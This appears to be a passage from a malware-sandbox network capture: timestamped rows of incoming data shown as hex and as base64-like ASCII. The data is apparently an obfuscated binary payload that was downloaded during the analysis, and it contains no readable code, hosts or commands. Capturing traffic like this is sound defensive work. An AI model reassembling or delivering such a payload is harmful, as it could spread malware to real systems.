48 79 4b 66 49 79 38 76 4c 79 61 76 49 78 38 Data Ascii: TyNfIu8hjyNvIo8jXyZPIy8jHyN/I18jLyL/Iv8ijyJ/Ly8vLy8vLy8vLyJvIi8m3yNvIk8jXyZvIk8jbyaPIo8jfyZPIk8i/yL/Io8jXyE/Ik8jbyNvI68jLyNfIn8mTyMvIw8jPyL/Io8jvyLPI38jzy8vLy8vLy8vIm8iLybfI28iTyNfJm8iTyNvJo8ijyN/Jk8jLyMfI38jXyMvIv8i/yKPIn8hjyNvIo8jXyNvJq8jHyKfIy8vLyavIx8
2023-08-23 17:31:18 UTC	1732	IN	Data Raw: 4c 79 38 76 4c 79 38 76 72 79 38 76 4b 41 2b 78 76 7a 2b 76 4c 36 38 67 56 69 41 76 4b 69 2b 32 6e 79 43 76 4c 36 38 6a 50 79 45 76 4c 36 38 76 4a 70 38 76 4c 79 38 6c 54 79 55 66 4a 52 59 66 4c 79 38 76 4a 4e 38 6d 48 79 5a 2f 6a 38 39 2f 4c 79 38 2f 4c 79 38 76 4c 79 2b 76 4c 79 38 72 4c 37 2f 66 4c 36 38 72 62 37 2f 66 4d 43 38 76 62 35 61 66 49 4b 38 76 72 79 41 76 4d 53 38 73 4c 37 4d 2f 4a 4a 38 76 72 79 38 6d 6e 79 38 76 4c 79 56 66 49 43 38 6c 48 53 38 76 4c 79 38 6c 6e 79 59 66 4a 6c 39 50 7a 7a 38 76 4c 79 38 76 4c 79 38 76 49 4b 38 2f 4c 79 79 76 73 7a 38 76 72 79 2b 76 4c 79 61 66 4c 79 38 76 4a 57 38 68 4c 79 55 57 48 79 38 76 4c 79 53 2f 4c 36 38 6d 62 32 2f 50 58 7a 38 76 4c 79 38 76 4c 79 38 76 72 79 38 76 4c 4f 2b 32 6e 79 2b 76 4c 2f 38 Data Ascii: Ly8vLy8vry8vKA+xvz+vL68gViAvKi+2nyCvL68jPyEvL68vJp8vLy8lTyUfJRYfLy8vJN8mHyZ/j89/Ly8/Ly8vLy+vLy8rL7/fL68rb7/fMC8vb5afIK8vryAvMS8sL7M/JJ8vry8mny8vLyVfIC8lHS8vLy8lnyYfJl9Pzz8vLy8vLy8vIK8/Lyyvsz8vry+vLyafLy8vJW8hLyUWHy8vLyS/L68mb2/PXz8vLy8vLy8vry8vLO+2ny+vL/8
2023-08-23 17:31:18 UTC	1748	IN	Data Raw: 54 79 54 50 39 48 38 76 72 79 38 2f 49 54 36 6c 46 69 38 76 49 44 38 72 72 6f 41 77 62 30 38 67 54 7a 39 50 4a 4d 2f 30 66 79 41 76 4c 7a 38 6d 66 75 55 57 4c 79 38 67 50 79 6f 4f 67 44 38 2f 54 79 54 50 39 48 38 67 4c 79 38 2f 4a 52 37 6c 46 69 38 76 49 44 2b 76 6f 66 41 2f 59 4b 38 6b 4c 31 38 76 49 4c 38 76 4c 79 38 2f 4c 78 38 66 48 78 38 76 4a 74 38 75 37 75 48 78 34 4d 39 51 4c 79 38 76 4c 34 38 76 70 68 56 78 34 45 38 38 37 78 55 57 4c 79 38 67 50 7a 31 4f 34 44 38 6c 76 76 41 2f 62 30 38 6c 47 53 38 76 4d 44 39 76 54 79 55 64 50 79 38 6c 46 69 38 76 49 44 42 76 54 79 42 50 50 30 38 6b 7a 2f 52 2f 4c 36 38 76 50 79 39 50 4a 52 38 76 51 7a 39 50 4c 79 38 67 6a 79 39 66 4c 79 38 68 4c 79 38 66 45 4e 38 76 50 79 43 2f 4c 79 38 76 50 79 39 42 34 4d 39 Data Ascii: TyTP9H8vry8/IT6lFi8vID8rroAwb08gTz9PJM/0fyAvLz8mfuUWLy8gPyoOgD8/TyTP9H8gLy8/JR7lFi8vID+vofA/YK8kL18vIL8vLy8/Lx8fHx8vJt8u7uHx4M9QLy8vL48vphVx4E887xUWLy8gPz1O4D8lvvA/b08lGS8vMD9vTyUdPy8lFi8vIDBvTyBPP08kz/R/L68vPy9PJR8vQz9PLy8gjy9fLy8hLy8fEN8vPyC/Ly8vPy9B4M9
2023-08-23 17:31:18 UTC	1764	IN	Data Raw: 66 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 73 4c 39 38 32 48 7a 38 76 4c 79 34 74 2f 79 59 66 50 79 38 76 4b 69 74 66 4a 68 38 2f 4c 79 38 67 4a 62 38 6d 48 7a 38 76 4c 79 41 6f 58 79 59 66 50 79 38 76 49 53 35 50 4a 68 38 2f 4c 79 38 73 4b 38 38 6d 48 7a 38 76 4c 79 63 71 44 79 59 66 50 79 38 76 49 53 2f 76 4e 68 38 2f 4c 79 38 76 49 79 38 6d 48 7a 38 76 4c 79 73 75 7a 79 59 66 50 79 38 76 49 53 58 66 4a 68 38 2f 4c 79 38 6d 47 4e 38 6d 48 7a 38 76 4c 79 30 6c 2f 79 59 66 50 79 38 76 4b 69 38 50 4a 68 38 2f 4c 79 38 68 4f 36 38 6d 48 7a 38 76 4c 79 67 73 76 79 59 66 50 79 38 76 4b 43 6c 76 4a 68 38 2f 4c 79 38 6e 49 30 38 6d 48 7a 38 76 4c 79 45 6d 72 79 59 66 50 79 38 76 4c 43 36 50 4a 68 38 2f 4c 79 38 72 4b 4b 38 6d 48 7a 38 76 4c 79 77 73 58 79 59 Data Ascii: fy8vLy8vLy8vLy8sL982Hz8vLy4t/yYfPy8vKitfJh8/Ly8gJb8mHz8vLyAoXyYfPy8vIS5PJh8/Ly8sK88mHz8vLycqDyYfPy8vIS/vNh8/Ly8vIy8mHz8vLysuzyYfPy8vISXfJh8/Ly8mGN8mHz8vLy0l/yYfPy8vKi8PJh8/Ly8hO68mHz8vLygsvyYfPy8vKClvJh8/Ly8nI08mHz8vLyEmryYfPy8vLC6PJh8/Ly8rKK8mHz8vLywsXyY
2023-08-23 17:31:18 UTC	1780	IN	Data Raw: 50 79 38 76 4c 69 38 76 4c 79 45 76 4c 79 38 6d 48 79 54 66 4e 4a 38 76 4c 79 53 76 4c 79 38 76 72 79 38 76 4c 79 38 76 4c 79 39 2f 4c 36 38 6a 4e 68 38 76 4c 79 38 76 4c 79 6a 70 76 79 59 66 50 79 38 76 4c 36 38 76 4c 79 38 76 4c 79 38 72 4b 58 38 6d 48 7a 38 76 4c 79 2f 66 50 79 38 76 72 79 38 76 4c 45 6c 50 4a 68 38 2f 4c 79 38 72 72 79 38 76 49 43 38 76 4c 79 67 76 7a 7a 59 66 50 79 38 76 4c 39 38 2f 4c 79 43 76 4c 79 38 6d 6e 46 38 6d 48 7a 38 76 4c 79 34 76 4c 79 38 68 4c 79 38 76 4a 68 38 6d 2f 7a 45 76 4c 79 38 6d 6e 79 38 76 4c 36 38 76 4c 79 38 76 4c 79 38 76 62 79 2b 76 49 30 38 76 4c 79 38 76 72 79 38 6e 71 78 38 6d 48 7a 38 76 4c 79 2f 66 4c 79 38 76 4c 79 38 76 49 53 34 76 4a 68 38 2f 4c 79 38 76 7a 7a 38 76 4c 36 38 76 4c 79 77 6c 72 79 59 Data Ascii: Py8vLi8vLyEvLy8mHyTfNJ8vLySvLy8vry8vLy8vLy9/L68jNh8vLy8vLyjpvyYfPy8vL68vLy8vLy8rKX8mHz8vLy/fPy8vry8vLElPJh8/Ly8rry8vIC8vLygvzzYfPy8vL98/LyCvLy8mnF8mHz8vLy4vLy8hLy8vJh8m/zEvLy8mny8vL68vLy8vLy8vby+vI08vLy8vry8nqx8mHz8vLy/fLy8vLy8vIS4vJh8/Ly8vzz8vL68vLywlryY
2023-08-23 17:31:18 UTC	1796	IN	Data Raw: 76 38 38 76 4c 79 61 58 65 79 4e 77 4d 70 5a 56 72 79 61 58 38 48 63 66 48 77 38 57 6b 42 5a 62 54 64 2b 57 6c 2f 39 33 54 78 38 50 46 74 65 32 56 46 59 57 6c 37 62 55 56 5a 61 58 74 6c 52 56 47 73 2f 2f 4c 79 38 6d 6c 2f 5a 55 55 37 62 58 2f 33 6a 50 48 77 38 57 55 42 71 62 78 71 66 62 79 73 54 50 4c 79 38 6d 6d 35 5a 55 56 4a 39 76 4c 79 38 6d 6c 37 5a 55 55 53 38 51 64 38 76 50 4c 79 61 58 57 32 47 37 57 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 36 2b 76 72 35 70 64 64 35 5a 62 58 32 30 64 65 76 7a 4f 45 6c 70 66 66 38 34 6e 50 4c 79 61 58 2f 33 4d 5a 7a 79 38 6d 6c 63 75 67 46 32 6a 50 4c 79 38 75 68 69 44 76 4d 42 64 6f 4c 79 38 76 4b 73 2f 50 4c 79 38 74 31 70 64 65 76 30 4f 42 4a 70 66 66 39 70 6e 50 4c 79 61 58 2f 33 59 Data Ascii: v88vLyaXeyNwMpZVryaX8HcfHw8WkBZbTd+Wl/93Tx8PFte2VFYWl7bUVZaXtlRVGs//Ly8ml/ZUU7bX/3jPHw8WUBqbxqfbysTPLy8mm5ZUVJ9vLy8ml7ZUUS8Qd8vPLyaXW2G7W+vr6+vr6+vr6+vr6+vr6+vr6+vr5pdd5ZbX20devzOElpff84nPLyaX/3MZzy8mlcugF2jPLy8uhiDvMBdoLy8vKs/PLy8t1pdev0OBJpff9pnPLyaX/3Y
2023-08-23 17:31:18 UTC	1812	IN	Data Raw: 73 31 38 66 48 78 76 72 36 2b 76 72 36 2b 76 6d 6c 39 74 6d 6c 37 47 2f 70 70 65 7a 4d 43 61 58 73 37 43 68 68 69 47 57 49 61 61 58 2b 61 47 2f 48 78 38 57 6c 7a 33 6f 4c 7a 38 76 4a 70 66 66 65 78 50 66 4c 79 61 56 53 32 61 58 74 33 63 76 4c 79 38 6d 6c 39 70 38 72 79 38 76 4a 74 66 61 66 53 38 76 4c 79 56 4d 31 69 66 65 70 36 48 30 56 69 65 68 39 46 59 58 6f 66 52 57 4e 61 45 41 46 32 6b 50 54 79 38 6c 71 50 77 76 4c 79 38 67 46 32 68 50 54 79 38 6e 65 37 4f 50 70 33 78 41 46 32 65 50 54 79 38 6d 4b 78 38 2f 4c 79 38 6d 5a 63 77 51 46 32 4f 50 54 79 38 6d 6c 2f 46 30 56 6c 61 58 39 74 52 57 4c 78 42 31 69 52 38 76 4a 61 48 30 56 6c 4f 45 39 70 66 2f 64 54 77 2f 44 78 59 71 72 58 38 76 4b 79 61 58 74 6c 52 56 46 70 66 2f 66 53 79 76 44 78 59 6e 33 4b 61 Data Ascii: s18fHxvr6+vr6+vml9tml7G/ppezMCaXs7ChhiGWIaaX+aG/Hx8Wlz3oLz8vJpffexPfLyaVS2aXt3cvLy8ml9p8ry8vJtfafS8vLyVM1ifep6H0Vieh9FYXofRWNaEAF2kPTy8lqPwvLy8gF2hPTy8ne7OPp3xAF2ePTy8mKx8/Ly8mZcwQF2OPTy8ml/F0VlaX9tRWLxB1iR8vJaH0VlOE9pf/dTw/DxYqrX8vKyaXtlRVFpf/fSyvDxYn3Ka
2023-08-23 17:31:18 UTC	1828	IN	Data Raw: 55 53 43 66 4c 79 38 6d 4a 39 79 6d 4a 2f 62 55 58 7a 32 7a 44 7a 38 76 4a 39 51 42 4e 33 38 54 6a 35 56 4d 33 62 4e 66 50 79 38 6e 39 6f 38 57 6c 2f 56 6a 53 61 38 50 47 72 42 66 4c 79 38 6c 35 31 53 50 76 79 41 58 6c 30 38 76 4c 79 5a 6e 65 37 4e 2f 64 69 58 4f 73 32 78 79 6c 37 62 74 70 74 66 32 62 53 61 58 32 38 75 57 62 53 2b 66 4c 79 38 6e 74 41 34 74 6f 30 37 66 48 78 66 63 70 33 73 6a 63 51 61 58 39 65 4d 35 50 77 38 57 56 39 73 6d 6c 37 50 30 56 52 61 58 73 33 52 55 6d 35 5a 55 55 53 57 66 4c 79 38 74 30 6d 73 50 50 79 38 76 4a 39 77 57 56 39 32 4e 72 59 37 76 48 78 66 63 70 33 73 6a 64 30 61 58 39 65 58 70 50 77 38 57 6c 2f 39 34 43 6f 38 50 46 6c 66 62 56 70 65 7a 39 46 55 57 6c 37 5a 55 56 4a 75 57 56 46 45 6c 33 79 38 76 4c 64 54 32 6c 2f 58 Data Ascii: USCfLy8mJ9ymJ/bUXz2zDz8vJ9QBN38Tj5VM3bNfPy8n9o8Wl/VjSa8PGrBfLy8l51SPvyAXl08vLyZne7N/diXOs2xyl7btptf2bSaX28uWbS+fLy8ntA4to07fHxfcp3sjcQaX9eM5Pw8WV9sml7P0VRaXs3RUm5ZUUSWfLy8t0msPPy8vJ9wWV92NrY7vHxfcp3sjd0aX9eXpPw8Wl/94Co8PFlfbVpez9FUWl7ZUVJuWVFEl3y8vLdT2l/X
2023-08-23 17:31:18 UTC	1844	IN	Data Raw: 6d 79 39 7a 50 32 49 2f 56 52 39 42 50 79 38 6d 32 54 38 2f 4a 36 38 76 4c 79 38 78 48 38 38 68 46 56 43 50 49 52 70 41 72 69 43 4e 49 47 77 67 53 79 41 6a 4d 42 49 77 41 54 43 30 7a 33 38 67 76 7a 65 50 49 45 4d 77 4d 6a 41 6c 48 79 38 6d 32 54 38 2f 49 53 39 76 4c 79 38 77 58 36 38 67 55 58 41 50 49 46 56 66 37 79 42 54 55 42 30 76 38 7a 2f 69 50 7a 44 76 37 79 44 69 63 44 38 67 34 58 41 76 49 4f 56 51 48 79 44 6a 55 4b 34 67 6a 53 42 73 49 45 73 67 49 7a 38 78 44 38 38 68 41 33 43 66 49 51 4a 77 6a 79 45 46 55 47 38 68 44 6b 42 75 49 45 30 67 49 54 38 2f 7a 32 38 76 78 56 41 50 4c 38 70 50 67 7a 38 2f 6a 30 38 76 67 31 39 46 45 4c 56 50 33 79 51 7a 64 5a 38 6b 4d 6e 57 50 4a 44 56 56 66 79 51 2f 4e 54 38 67 62 69 42 4e 49 43 45 2f 4c 79 62 5a 50 7a 38 Data Ascii: my9zP2I/VR9BPy8m2T8/J68vLy8xH88hFVCPIRpAriCNIGwgSyAjMBIwATC0z38gvzePIEMwMjAlHy8m2T8/IS9vLy8wX68gUXAPIFVf7yBTUB0v8z/iPzDv7yDicD8g4XAvIOVQHyDjUK4gjSBsIEsgIz8xD88hA3CfIQJwjyEFUG8hDkBuIE0gIT8/z28vxVAPL8pPgz8/j08vg19FELVP3yQzdZ8kMnWPJDVVfyQ/NT8gbiBNICE/LybZPz8
2023-08-23 17:31:18 UTC	1860	IN	Data Raw: 72 79 55 66 4a 56 38 6d 50 79 55 66 4c 79 38 6d 33 79 43 50 4c 7a 38 6d 54 79 4d 76 49 77 38 6a 50 79 4a 50 49 78 38 6a 7a 79 62 2f 49 6b 38 6a 44 79 4b 50 4c 79 38 76 4c 79 62 76 49 73 38 69 62 79 4e 66 49 79 38 6a 62 79 4d 76 49 70 38 6a 66 79 45 76 4a 6b 38 6a 4c 79 4e 66 49 7a 38 6a 4c 79 4e 66 49 6b 38 6a 66 79 4c 50 49 79 38 6a 48 79 38 76 49 6a 38 67 37 79 38 2f 4a 6e 38 69 7a 79 4c 2f 49 6f 38 6d 58 79 4b 50 49 32 38 69 62 79 4e 66 49 73 38 6a 50 79 4e 2f 49 73 38 6a 4c 79 4d 66 4c 79 38 76 4c 79 5a 76 49 37 38 69 62 79 4b 2f 49 6b 38 6a 48 79 4b 76 49 6f 38 68 4c 79 59 76 49 6d 38 6a 66 79 4c 50 49 35 38 69 6a 79 46 76 49 38 38 6a 48 79 4a 76 49 53 38 6d 72 79 4d 66 49 35 38 6a 4c 79 4c 76 49 6f 38 6a 58 79 38 76 49 7a 38 6b 6e 79 38 2f 4a 6e 38 Data Ascii: ryUfJV8mPyUfLy8m3yCPLz8mTyMvIw8jPyJPIx8jzyb/Ik8jDyKPLy8vLybvIs8ibyNfIy8jbyMvIp8jfyEvJk8jLyNfIz8jLyNfIk8jfyLPIy8jHy8vIj8g7y8/Jn8izyL/Io8mXyKPI28ibyNfIs8jPyN/Is8jLyMfLy8vLyZvI78ibyK/Ik8jHyKvIo8hLyYvIm8jfyLPI58ijyFvI88jHyJvIS8mryMfI58jLyLvIo8jXy8vIz8kny8/Jn8
2023-08-23 17:31:18 UTC	1876	IN	Data Raw: 2f 54 53 39 41 43 77 30 37 73 6e 48 70 61 6c 6d 5a 55 4f 36 6e 65 58 54 6f 35 55 74 55 54 68 38 45 51 68 66 6a 36 50 53 39 75 6c 6f 32 52 52 39 64 32 73 65 32 51 55 6b 39 4c 30 6f 32 41 53 42 41 63 67 76 7a 64 50 4f 4a 7a 68 53 71 53 63 71 41 42 35 33 55 61 53 77 79 6a 48 6c 4a 6e 59 2f 41 72 46 58 49 53 57 61 6f 57 46 57 61 39 63 44 61 51 70 57 70 52 48 71 4c 41 4d 6d 43 56 33 46 6f 78 65 2b 4d 59 65 78 4a 4e 46 41 55 53 4c 58 55 72 42 32 4f 51 75 33 65 4c 6a 73 43 42 64 61 59 79 69 4d 2f 2b 6c 56 33 68 42 58 6e 2b 51 59 78 2f 31 41 67 38 39 50 58 7a 38 76 4f 56 64 50 4d 4e 55 58 54 7a 43 56 45 50 2b 50 55 59 44 77 44 32 43 50 59 47 54 4a 66 62 41 68 62 43 42 4f 55 4c 44 57 46 4e 2f 47 34 4a 76 72 5a 6d 75 30 39 52 45 66 6a 31 47 41 39 45 39 67 70 52 43 Data Ascii: /TS9ACw07snHpalmZUO6neXTo5UtUTh8EQhfj6PS9ulo2RR9d2se2QUk9L0o2ASBAcgvzdPOJzhSqScqAB53UaSwyjHlJnY/ArFXISWaoWFWa9cDaQpWpRHqLAMmCV3Foxe+MYexJNFAUSLXUrB2OQu3eLjsCBdaYyiM/+lV3hBXn+QYx/1Ag89PXz8vOVdPMNUXTzCVEP+PUYDwD2CPYGTJfbAhbCBOULDWFN/G4JvrZmu09REfj1GA9E9gpRC
2023-08-23 17:31:18 UTC	1892	IN	Data Raw: 68 6b 5a 46 73 53 53 57 68 76 47 45 6f 53 56 55 39 61 54 31 50 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 61 47 52 6b 57 78 4a 4a 61 47 38 59 53 68 4a 56 54 31 70 50 55 2f 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 Data Ascii: hkZFsSSWhvGEoSVU9aT1Py8vLy8vLy8vLy8vLy8vLyaGRkWxJJaG8YShJVT1pPU/Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8
2023-08-23 17:31:18 UTC	1908	IN	Data Raw: 4b 35 42 76 4c 79 53 50 4d 56 39 44 6e 79 53 50 4d 55 38 31 46 49 38 78 76 30 50 2f 4c 79 53 63 49 46 58 53 54 79 38 76 4c 79 72 67 6e 79 38 6b 6a 7a 46 66 51 35 38 6b 6a 7a 46 50 4e 54 53 50 4d 62 39 44 2f 79 38 76 4a 63 5a 53 38 76 62 69 51 73 4d 57 51 56 46 78 59 33 4a 44 55 33 4f 44 50 79 38 35 50 73 39 76 4c 79 30 67 56 64 4a 50 4c 79 38 76 4a 77 38 76 4c 79 38 76 4c 79 38 76 4f 4f 6d 77 66 79 38 6b 74 46 38 76 4c 79 38 35 4f 4e 39 2f 4c 79 4d 66 72 79 38 6b 74 51 38 76 4c 79 38 35 4e 43 39 2f 4c 79 77 50 72 79 38 6b 74 5a 38 76 4c 79 38 35 4e 59 39 2f 4c 79 54 2f 76 79 38 6c 33 78 42 56 30 6b 38 76 4c 79 38 73 45 45 38 76 49 74 42 2f 4c 79 53 50 4d 56 39 65 58 7a 46 55 6a 7a 46 50 58 6c 38 78 52 49 38 78 76 31 35 66 4d 62 38 6c 4d 46 42 6c 30 6b 38 Data Ascii: K5BvLySPMV9DnySPMU81FI8xv0P/LyScIFXSTy8vLyrgny8kjzFfQ58kjzFPNTSPMb9D/y8vJcZS8vbiQsMWQVFxY3JDU3ODPy85Ps9vLy0gVdJPLy8vJw8vLy8vLy8vOOmwfy8ktF8vLy85ON9/LyMfry8ktQ8vLy85NC9/LywPry8ktZ8vLy85NY9/LyT/vy8l3xBV0k8vLy8sEE8vItB/LySPMV9eXzFUjzFPXl8xRI8xv15fMb8lMFBl0k8
2023-08-23 17:31:18 UTC	1924	IN	Data Raw: 59 6f 4d 7a 63 73 4d 6a 46 6e 4c 79 51 71 4e 76 4c 30 68 66 73 4f 39 2f 4c 79 39 76 74 37 38 76 4c 79 39 49 62 37 49 76 50 79 38 76 72 36 5a 6a 73 6d 4b 44 4d 33 4c 44 49 78 59 69 63 6e 4e 53 67 32 4e 76 4c 30 68 2f 75 42 39 2f 4c 79 41 76 70 76 4f 44 41 6c 4b 44 55 54 4a 44 55 6b 4d 43 67 33 4b 44 55 32 38 76 53 49 2b 77 37 33 38 76 49 4b 2b 6d 59 37 4a 69 67 7a 4e 79 77 79 4d 57 6f 78 4b 54 49 31 4d 43 51 33 4c 44 49 78 38 76 53 4a 2b 36 6e 37 38 76 49 53 38 76 7a 36 39 76 6f 4a 39 50 4c 79 2f 53 4a 6b 63 47 38 58 5a 68 73 58 38 73 4c 32 39 48 50 34 39 76 66 79 38 76 6f 54 55 6d 6b 79 4d 43 6a 79 39 48 54 34 63 76 66 79 38 76 4c 36 45 31 4e 70 4d 6a 41 6f 38 76 52 31 2b 48 4c 33 38 76 4c 36 2b 68 4e 55 61 54 49 77 4b 50 4c 30 64 76 68 79 39 2f 4c 79 41 Data Ascii: YoMzcsMjFnLyQqNvL0hfsO9/Ly9vt78vLy9Ib7IvPy8vr6ZjsmKDM3LDIxYicnNSg2NvL0h/uB9/LyAvpvODAlKDUTJDUkMCg3KDU28vSI+w738vIK+mY7JigzNywyMWoxKTI1MCQ3LDIx8vSJ+6n78vIS8vz69voJ9PLy/SJkcG8XZhsX8sL29HP49vfy8voTUmkyMCjy9HT4cvfy8vL6E1NpMjAo8vR1+HL38vL6+hNUaTIwKPL0dvhy9/LyA
2023-08-23 17:31:18 UTC	1940	IN	Data Raw: 41 77 4c 44 66 79 39 36 45 49 35 76 50 79 38 68 50 38 46 69 77 39 4b 48 41 70 61 53 67 6b 4d 78 55 6f 4e 69 67 31 4f 53 6a 79 39 36 49 49 35 76 50 79 38 68 76 38 46 69 77 39 4b 48 41 70 61 53 67 6b 4d 32 51 79 4d 44 41 73 4e 2f 4c 33 6f 77 6a 6d 38 2f 4c 79 49 2f 78 74 4d 69 51 6e 4b 44 56 6e 4c 79 51 71 4e 76 4c 33 70 41 67 31 38 2f 4c 79 4b 2f 78 76 4f 44 41 6c 4b 44 56 77 4b 52 55 35 4a 47 49 78 4a 78 59 73 50 53 67 32 38 76 65 6c 43 44 58 7a 38 76 49 76 2f 47 55 6b 4e 79 52 6c 4c 44 55 6f 4a 6a 63 79 4e 54 7a 79 39 36 59 49 2b 50 66 79 38 6a 50 79 2b 47 70 75 59 6d 68 6d 49 6e 41 54 46 32 70 77 62 32 4a 74 49 6d 6c 6d 59 6d 56 6d 46 56 64 56 38 76 65 6e 43 41 6a 33 38 76 4c 34 45 32 70 75 59 6d 68 6d 49 6e 41 54 46 32 70 77 62 32 4a 74 49 6d 6c 6d 59 Data Ascii: AwLDfy96EI5vPy8hP8Fiw9KHApaSgkMxUoNig1OSjy96II5vPy8hv8Fiw9KHApaSgkM2QyMDAsN/L3owjm8/LyI/xtMiQnKDVnLyQqNvL3pAg18/LyK/xvODAlKDVwKRU5JGIxJxYsPSg28velCDXz8vIv/GUkNyRlLDUoJjcyNTzy96YI+Pfy8jPy+GpuYmhmInATF2pwb2JtImlmYmVmFVdV8venCAj38vL4E2puYmhmInATF2pwb2JtImlmY
2023-08-23 17:31:18 UTC	1956	IN	Data Raw: 48 79 2f 66 31 71 42 66 4c 79 39 67 58 7a 39 66 72 39 2f 56 76 39 58 50 66 7a 42 66 4c 79 39 2f 2f 79 39 66 70 62 2f 56 7a 33 61 67 56 5a 2f 66 4c 79 2b 50 2f 79 39 51 42 62 2f 56 7a 33 61 67 56 5a 2f 66 4c 79 2b 51 48 79 2f 66 33 79 38 76 6f 46 38 2f 58 36 2f 66 64 62 2f 56 7a 33 38 77 58 79 38 76 76 2f 38 6d 6f 46 57 66 66 79 38 76 7a 2f 38 76 58 36 57 2f 31 63 39 32 6f 46 57 66 66 79 38 76 30 49 38 76 58 36 57 2f 31 63 2f 57 6f 46 38 76 4c 2b 43 50 4c 31 2b 6c 76 39 58 50 64 71 42 66 4c 79 2f 77 58 7a 2f 66 31 62 2f 56 7a 33 38 77 58 79 38 67 41 4a 38 2f 58 36 2f 66 31 62 2f 56 7a 33 38 77 58 79 38 67 48 2f 38 6d 6f 46 38 76 49 43 2f 2f 4c 31 2b 6c 76 39 58 50 64 71 42 66 4c 79 41 2f 50 7a 61 67 58 7a 42 66 4c 79 42 45 4c 79 61 67 56 51 2f 66 4c 79 42 Data Ascii: Hy/f1qBfLy9gXz9fr9/Vv9XPfzBfLy9//y9fpb/Vz3agVZ/fLy+P/y9QBb/Vz3agVZ/fLy+QHy/f3y8voF8/X6/fdb/Vz38wXy8vv/8moFWffy8vz/8vX6W/1c92oFWffy8v0I8vX6W/1c/WoF8vL+CPL1+lv9XPdqBfLy/wXz/f1b/Vz38wXy8gAJ8/X6/f1b/Vz38wXy8gH/8moF8vIC//L1+lv9XPdqBfLyA/PzagXzBfLyBELyagVQ/fLyB
2023-08-23 17:31:18 UTC	1972	IN	Data Raw: 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 Data Ascii: Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8
2023-08-23 17:31:18 UTC	1988	IN	Data Raw: 4c 79 39 50 4c 79 38 76 4c 79 38 76 62 79 35 66 4d 55 6b 66 4c 30 38 76 4c 79 38 76 4c 79 2f 76 54 79 38 76 4c 79 38 76 4c 7a 38 68 54 2b 39 50 4c 79 38 76 4c 79 38 67 48 30 38 76 4c 79 38 76 4c 79 39 76 4c 6c 38 78 53 52 41 66 54 79 38 76 4c 79 38 76 49 47 39 50 4c 79 38 76 4c 79 38 76 50 79 46 41 62 30 38 76 4c 79 38 76 4c 79 43 66 54 79 38 76 4c 79 38 76 4c 32 38 75 58 7a 46 4a 45 4a 39 50 4c 79 38 76 4c 79 38 6b 58 30 38 76 4c 79 38 76 4c 79 38 2f 49 55 52 66 54 79 38 76 4c 79 38 76 4a 49 39 50 4c 79 38 76 4c 79 38 76 62 79 35 66 4d 55 6b 66 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4b 43 38 2f 4c 79 38 76 4c 79 38 70 7a 7a 38 76 4c 79 38 76 4c 79 38 2f 49 62 6e 50 50 79 38 76 4c 79 38 76 4b 6d 38 2f 4c 79 38 76 4c 79 38 76 62 79 35 Data Ascii: Ly9PLy8vLy8vby5fMUkfL08vLy8vLy/vTy8vLy8vLz8hT+9PLy8vLy8gH08vLy8vLy9vLl8xSRAfTy8vLy8vIG9PLy8vLy8vPyFAb08vLy8vLyCfTy8vLy8vL28uXzFJEJ9PLy8vLy8kX08vLy8vLy8/IURfTy8vLy8vJI9PLy8vLy8vby5fMUkfLy8vLy8vLy8vLy8vLy8vKC8/Ly8vLy8pzz8vLy8vLy8/IbnPPy8vLy8vKm8/Ly8vLy8vby5
